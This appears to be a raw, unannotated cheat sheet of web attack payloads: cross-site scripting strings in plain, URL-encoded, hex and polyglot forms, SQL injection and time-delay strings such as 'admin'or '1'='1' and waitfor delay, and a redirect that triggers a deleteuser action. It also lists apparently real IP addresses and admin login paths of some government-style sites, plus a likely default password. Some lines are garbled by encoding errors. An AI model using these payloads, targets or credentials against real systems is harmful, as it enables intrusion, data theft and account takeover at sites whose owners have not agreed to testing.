/*!*/
%0A%22%3E%3Cscript%3Ealert(444)%3C%2Fscript%3E
“>
“>
<%script>alert(‘XSS’)<%/script>
%uff1cscript%uff1ealert(9);%uff1c/script%uff1e
‘/>
<%tag style=â€xss:expression(alert(‘XSS’))â€>
‘ onmouseover=prompt(929623) bad=’
%0A%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%35%34%34%34%29%3C%2F%73%63%72%69%70%74%3E
1
1
‘>>
alert(XSS)
”;!–“=&{()}
“onmouseover=prompt(959295)>
“%20onmouseover=prompt(908001)%20bad=”
Click me
“0′; waitfor delay ‘0:0:25’ –
admin’or ‘1’ = ‘1’
\
“><script>alert(444)</script>
%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%32%33%29%3C%2F%73%63%72%69%70%74%3E
223E3C7363726970743E616C65727428343434293C2F7363726970743E
‘/
“
<? echo(‘<SCR)’; echo(‘IPT>alert(“XSS”)’); ?>
Bapatla’=sleep(6.896)=’
http://203.123.33.197/bbnl/content/
protected function _js_link_removal($match)
{
//echo “in link removal”;
return str_replace($match[1],
preg_replace(‘#href=.*?(?:alert\(|alert&\#40;|javascript:|livescript:|mocha:|charset=|window\.|document\.|\.cookie|
: http://203.110.84.86:2056/_layouts/PowerGrid/user/index.aspx , http://203.110.84.86:2056/_layouts/PowerGrid/admin/loginpage.aspx
“>
:::html 123″ onmouseover=”alert(document.domain);
admin Admin@1234
(http://164.100.140.21/rkvyodisha) %3Cscript xmlns=’http://www.w3.org/1999/xhtml’%3Ealert(1)%3C/script%3E
\”;alert(‘XSS’);// “>
“>
“>
‘+alert(‘Hllo’)&&null==’
“>
confirm(‘XSS’)
onerror=javascript:alert(2)
“>
“””””””>
http;//test.com>
‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>=&{}
”;!–“=&{()}
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
exp/*
- XSS
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE